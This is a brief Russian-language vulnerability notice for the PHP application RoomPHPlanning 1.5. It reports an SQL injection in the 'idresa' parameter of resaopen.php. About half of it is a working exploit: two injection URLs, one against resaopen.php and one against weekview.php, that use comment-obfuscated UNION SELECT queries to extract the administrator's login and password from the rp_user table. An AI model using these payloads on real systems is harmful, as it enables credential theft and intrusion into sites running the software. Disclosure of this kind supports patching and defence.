Программа: RoomPHPlanning 1.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «idresa» сценарием resaopen.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/resaopen.php?idresa=-99999/**/union/*
*/select/**/1,2,3,4,5,6,concat(LoginUs,0x3a,char(58),PwdUs),8,9/*
*/from/**/rp_user/**/where/**/IdRk=1/*
http://site.com/weekview.php?idroom=-999/**/union/* */select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/*
*/from/**/rp_user/**/where/**/IdRk=1/*
